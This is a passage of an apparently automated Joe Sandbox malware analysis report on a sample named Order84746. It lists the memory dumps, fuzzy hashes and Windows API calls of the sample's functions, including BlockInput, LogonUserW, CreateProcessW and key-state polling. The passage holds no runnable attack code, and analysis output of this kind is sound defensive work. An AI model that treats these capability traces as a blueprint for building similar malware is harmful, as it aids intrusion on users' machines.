                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __itow__swprintf
                          • String ID:
                          • API String ID: 674341424-0
                          • Opcode ID: 33502ccc1cade14207883327a7ef299fc599b12db5bf7cd93dfe881e75a8c6bc
                          • Instruction ID: f0613f2e823030cf682ed43e7a3a9be9148da40de74eb930d6bceaff3ae3ff2f
                          • Opcode Fuzzy Hash: 33502ccc1cade14207883327a7ef299fc599b12db5bf7cd93dfe881e75a8c6bc
                          • Instruction Fuzzy Hash: 072299B16083519FC724DF29C880B6BB7E4FF85314F10492DF99A97291DBB1E948CB92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5916e76cd40e2a090b672ebe7b1ded04fac50ffa39a331504e9cff1e7115ba23
                          • Instruction ID: ff5b71721474309725b1041de696f54b38ed81e6edd786fd7e5171a83dab9cfe
                          • Opcode Fuzzy Hash: 5916e76cd40e2a090b672ebe7b1ded04fac50ffa39a331504e9cff1e7115ba23
                          • Instruction Fuzzy Hash: 36B1F021E3AF414DD26396398831336B65CAFBB2D5B92D71BFC1E70D62EB6285C35180
                          APIs
                          • __time64.LIBCMT ref: 0092B6DF
                            • Part of subcall function 0090344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0092BDC3,00000000,?,?,?,?,0092BF70,00000000,?), ref: 00903453
                            • Part of subcall function 0090344A: __aulldiv.LIBCMT ref: 00903473
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Time$FileSystem__aulldiv__time64
                          • String ID:
                          • API String ID: 2893107130-0
                          • Opcode ID: 4e80a7bf03afe298596d099b8b5b0e87038213a6d79aaee6d3e40d71ddcb9f1e
                          • Instruction ID: 200fa0ae1e91e4c52cc6afa2cd0b767db748859752afe87f078e495db608f791
                          • Opcode Fuzzy Hash: 4e80a7bf03afe298596d099b8b5b0e87038213a6d79aaee6d3e40d71ddcb9f1e
                          • Instruction Fuzzy Hash: 4121A2726385108BCB29CF28D481A52F7E5EB95320B648E6DE0E5CB2C0CB74BA05DB94
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 009504F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 7a5512a9abddd3985b8fe23488365b781de27fadd6368479d0c1bee47796eb3f
                          • Instruction ID: 9646f458cc9ce8257db51f443451367bb9dbe7ce2256166ebe5fdbbf053ae839
                          • Opcode Fuzzy Hash: 7a5512a9abddd3985b8fe23488365b781de27fadd6368479d0c1bee47796eb3f
                          • Instruction Fuzzy Hash: 56110631204225BAFB28DF2ECC05F7E3658DBC1B21F248714FE129A5F2DA645D14A394
                          APIs
                            • Part of subcall function 008FB526: GetWindowLongW.USER32(?,000000EB), ref: 008FB537
                          • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,0095E467,?,?,?,?,00000000,?), ref: 00950127
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 0151dfa0426ff58d117e27293121d70019d64d80c12cf496680e48319218d4e6
                          • Instruction ID: eaf9686563cdb68520ad32605be6b744ad30b5be48ff7eacb5b0dfbce23dc168
                          • Opcode Fuzzy Hash: 0151dfa0426ff58d117e27293121d70019d64d80c12cf496680e48319218d4e6
                          • Instruction Fuzzy Hash: 9E012831A08114ABDF14CF26CC0ABB93B9AFFC5326F044115FD595B192C331AC24D7A1
                          APIs
                            • Part of subcall function 008FB526: GetWindowLongW.USER32(?,000000EB), ref: 008FB537
                          • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 0094E9F5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$CallLongProc
                          • String ID:
                          • API String ID: 4084987330-0
                          • Opcode ID: c5382f5f7ce9bfbc3003ee0a837cd30c7660c636b3656b1849e821602637b457
                          • Instruction ID: d8f41540ed4d419095867a0e3f9b4bc26bd55d6e545bfeb677599da3ef37b2ff
                          • Opcode Fuzzy Hash: c5382f5f7ce9bfbc3003ee0a837cd30c7660c636b3656b1849e821602637b457
                          • Instruction Fuzzy Hash: 19F03735604108AFCB159F94EC00C793BAAFB09360B048518FA159B6A1CB729860EBA0
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                            • Part of subcall function 008FB63C: GetCursorPos.USER32(000000FF), ref: 008FB64F
                            • Part of subcall function 008FB63C: ScreenToClient.USER32(00000000,000000FF), ref: 008FB66C
                            • Part of subcall function 008FB63C: GetAsyncKeyState.USER32(00000001), ref: 008FB691
                            • Part of subcall function 008FB63C: GetAsyncKeyState.USER32(00000002), ref: 008FB69F
                          • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0095E514,?,?,?,?,?,00000001,?), ref: 0094ECCA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                          • String ID:
                          • API String ID: 2356834413-0
                          • Opcode ID: f34de7c64138f8633e6251fc9268b1344283d0eb33dbbcb5df19bba6ec9417e1
                          • Instruction ID: c989cfb64889747970bae35de2548ff9f25aab06ff69f5a0015ff3c17c1a0526
                          • Opcode Fuzzy Hash: f34de7c64138f8633e6251fc9268b1344283d0eb33dbbcb5df19bba6ec9417e1
                          • Instruction Fuzzy Hash: 8AF0A030200228ABDF14AF19DC1AEBE3BA5FF01751F044015FA465A2A1C7B698B0EBD1
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?), ref: 008FAB45
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: cc915e5684588ffa1bb5f5fca127ccd9a7143c1e40c8fbec8c29bf8fe5c5c428
                          • Instruction ID: 4dc9adf16d6b4b58817bc312cae3970221870f55ecb6665a7547ef17aa19a1f8
                          • Opcode Fuzzy Hash: cc915e5684588ffa1bb5f5fca127ccd9a7143c1e40c8fbec8c29bf8fe5c5c428
                          • Instruction Fuzzy Hash: 99F08C34614219DFDB28DF19DC25A393BA6FB45371F04421AF9168B2B0E771D960EBA0
                          APIs
                          • BlockInput.USER32(00000001), ref: 00936ACA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: BlockInput
                          • String ID:
                          • API String ID: 3456056419-0
                          • Opcode ID: b29885441cac63c136e0d96efe2c8ecd7e0195ca2abf021a683f8bc9db8e55e1
                          • Instruction ID: 4468aaa479f5ed7b7b79ec4b9a4235b15084c67a5242bde777344b4edf677814
                          • Opcode Fuzzy Hash: b29885441cac63c136e0d96efe2c8ecd7e0195ca2abf021a683f8bc9db8e55e1
                          • Instruction Fuzzy Hash: 80E012392102046FC700EF69D404956B7ECEF68751F04C416EA45D7291DAB0F8048BA1
                          APIs
                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 009274DE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: mouse_event
                          • String ID:
                          • API String ID: 2434400541-0
                          • Opcode ID: 6bdff7ae410f5f4c2bf836cee2ffb2ec99f06aa6d11e2e6efd81946e58f1c807
                          • Instruction ID: 7307a271dca085683b81c5365eef8e312e99b129e7b82c9eb8c1c64f735bb9b7
                          • Opcode Fuzzy Hash: 6bdff7ae410f5f4c2bf836cee2ffb2ec99f06aa6d11e2e6efd81946e58f1c807
                          • Instruction Fuzzy Hash: A8D05EB062D32538EC2C37A4BC0FF76890EF3007C0FC08589B482E94F9B8C46801A032
                          APIs
                          • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0094F649
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DialogNtdllProc_
                          • String ID:
                          • API String ID: 3239928679-0
                          • Opcode ID: b35d4963b130028e331f9ee953a504596e8d31655f415a4c6c36c30922459031
                          • Instruction ID: 926c6d9b3ebfbe25a0d080bd41fa58cff024c5b6aa201d2d139663ff65a635f1
                          • Opcode Fuzzy Hash: b35d4963b130028e331f9ee953a504596e8d31655f415a4c6c36c30922459031
                          • Instruction Fuzzy Hash: 15F06D31605399AFDB21EF58DC15FC77B99EB1A720F084009FA21672E1CB706820EBA0
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 008FAB7D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: eb33deba85d1c28aec961a8396802a185c35e7653192234d0ac86e33d2b857dd
                          • Instruction ID: 6f04a786ea37fa4de989e1367cf7debed75c6536e60161d73cd51eba8ad245ab
                          • Opcode Fuzzy Hash: eb33deba85d1c28aec961a8396802a185c35e7653192234d0ac86e33d2b857dd
                          • Instruction Fuzzy Hash: 81E0C230644308FBCF14AFA4CC11E283B2AFF49314F144008F6058B2A1CB73A422EB40
                          APIs
                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0091AD3E), ref: 0091B124
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: LogonUser
                          • String ID:
                          • API String ID: 1244722697-0
                          • Opcode ID: 9063aad6b1d6e37284248e20f86a85c2305945b091ad9b2e6e582ee6947dbeac
                          • Instruction ID: debcf6f0358cc7fa87fc0316c332d68d8753ca2b5d7c00d78184eb88015dd4b8
                          • Opcode Fuzzy Hash: 9063aad6b1d6e37284248e20f86a85c2305945b091ad9b2e6e582ee6947dbeac
                          • Instruction Fuzzy Hash: 20D09E321A864EAEDF025FA4DD06EAE3F6AEB04701F448511FA25D50A1C675D531AB50
                          APIs
                          • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0095E4D1,?,?,?,?,?,?), ref: 0094F67F
                            • Part of subcall function 0094E32E: _memset.LIBCMT ref: 0094E33D
                            • Part of subcall function 0094E32E: _memset.LIBCMT ref: 0094E34C
                            • Part of subcall function 0094E32E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009A3D00,009A3D44), ref: 0094E37B
                            • Part of subcall function 0094E32E: CloseHandle.KERNEL32 ref: 0094E38D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                          • String ID:
                          • API String ID: 2364484715-0
                          • Opcode ID: 500035c18784a6ef7d877bdb8f7596341e46c9f8cbd5e38569b00e2f0f3c12a3
                          • Instruction ID: b1b20b62220001f3385a123fdcf2f489841169a1df42693d6910f28443e19971
                          • Opcode Fuzzy Hash: 500035c18784a6ef7d877bdb8f7596341e46c9f8cbd5e38569b00e2f0f3c12a3
                          • Instruction Fuzzy Hash: 75E04631214209DFCB02DF04DD15E9637A6FB08318F024015FA01472B1C731AC60EF40
                          APIs
                          • NtdllDialogWndProc_W.NTDLL ref: 0094F5D0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DialogNtdllProc_
                          • String ID:
                          • API String ID: 3239928679-0
                          • Opcode ID: 091184567c50347d570406022cfddf58c405a36a53f864bdfd3a6faf8e68126f
                          • Instruction ID: 0536c2402b47633442550ee80a839ff9fae15858486194add44490652c292d91
                          • Opcode Fuzzy Hash: 091184567c50347d570406022cfddf58c405a36a53f864bdfd3a6faf8e68126f
                          • Instruction Fuzzy Hash: CDE0173420824CEFCB01DF84DC44E863BA5EB1A314F050054FD058B371C771A830EBA1
                          APIs
                          • NtdllDialogWndProc_W.NTDLL ref: 0094F5FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DialogNtdllProc_
                          • String ID:
                          • API String ID: 3239928679-0
                          • Opcode ID: 20919b5f5c1eb66ca89dee3a93a8d4b9d23d626929ea7740fca1ae7be55bbeb6
                          • Instruction ID: b45c37ca455c64d643589493d74393e9b71a7c7168204d65cbdd744e8e99914d
                          • Opcode Fuzzy Hash: 20919b5f5c1eb66ca89dee3a93a8d4b9d23d626929ea7740fca1ae7be55bbeb6
                          • Instruction Fuzzy Hash: 9FE0E234204248EFCB01DF84D844E863BA5EB1A314F050054FD058B262C772A860EBA1
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                            • Part of subcall function 008FB73E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,008FB72B), ref: 008FB7F6
                            • Part of subcall function 008FB73E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,008FB72B,00000000,?,?,008FB2EF,?,?), ref: 008FB88D
                          • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,008FB2EF,?,?), ref: 008FB734
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                          • String ID:
                          • API String ID: 2797419724-0
                          • Opcode ID: 8b0f7bdf85d1e30b3a5e0a3329cd06fc0fbef2af47b8be978f622b0e99bb8573
                          • Instruction ID: 232c2d0af9e0ee2ba7f40aa31940b17a88aa14ff2270dd338d0ac0b2bbac6a46
                          • Opcode Fuzzy Hash: 8b0f7bdf85d1e30b3a5e0a3329cd06fc0fbef2af47b8be978f622b0e99bb8573
                          • Instruction Fuzzy Hash: B8D0803068430CB7DB103B74DD07F593E5EEB54750F048010F705AD1E1CBB1542055A5
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: NameUser
                          • String ID:
                          • API String ID: 2645101109-0
